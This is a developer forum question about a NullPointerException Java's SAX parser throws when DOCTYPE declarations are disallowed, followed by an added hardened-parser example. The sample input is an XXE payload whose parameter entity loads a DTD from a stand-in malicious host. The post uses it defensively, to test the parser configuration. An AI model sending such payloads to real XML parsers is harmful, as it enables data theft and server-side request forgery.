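Getting a NullPointerException when the disallow-doctype feature is enabled
I have set the "http://apache.org/xml/features/disallow-doctype-decl" feature to true on SAXParserFactory, and I get a NullPointerException when parsing XML that contains an external entity.
Code: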
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://malicioushost/xxe.xml" > %remote; %payload;]>
Error:
Caused by: java.lang.NullPointerException: null
at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:679) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:341) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1098) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1047) ~[na:1.7.0]
Does anyone know what additional settings should be applied to avoid the NPE?
The Java version I am using: 1.7.0_51
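An added example, not part of the original post: a SAXParserFactory that sets the question's disallow-doctype-decl feature together with the standard entity-related features, and a parse wrapper that fails closed, so that both the expected SAXParseException and an unexpected runtime failure such as the NPE in the trace count as rejection. The class and method names (`DoctypeRejectDemo`, `hardenedFactory`, `accepts`) are hypothetical, the input is constructed from the XML above with a root element appended, and nothing here is claimed to remove the NPE on 1.7.0_51.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class DoctypeRejectDemo {
    // Constructed sample input modelled on the XML in the question.
    static final String XML =
          "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE root [\n"
        + "<!ENTITY % remote SYSTEM \"http://malicioushost/xxe.xml\" > %remote; %payload;]>\n"
        + "<root/>";

    // Hypothetical helper: the feature from the question plus defence in depth.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true);
        spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any document that carries a DOCTYPE declaration.
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Even if a DOCTYPE were ever allowed, do not resolve external entities or DTDs.
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return spf;
    }

    // Hypothetical helper: true only if the document parsed cleanly.
    static boolean accepts(String xml) throws Exception {
        SAXParser parser = hardenedFactory().newSAXParser();
        try {
            // DefaultHandler.fatalError rethrows, so parsing stops at the DOCTYPE.
            parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXParseException | RuntimeException e) {
            // Fail closed: a parser-internal runtime error is also a rejection.
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("DOCTYPE document accepted: " + accepts(XML));
        System.out.println("plain document accepted: " + accepts("<root/>"));
    }
}
```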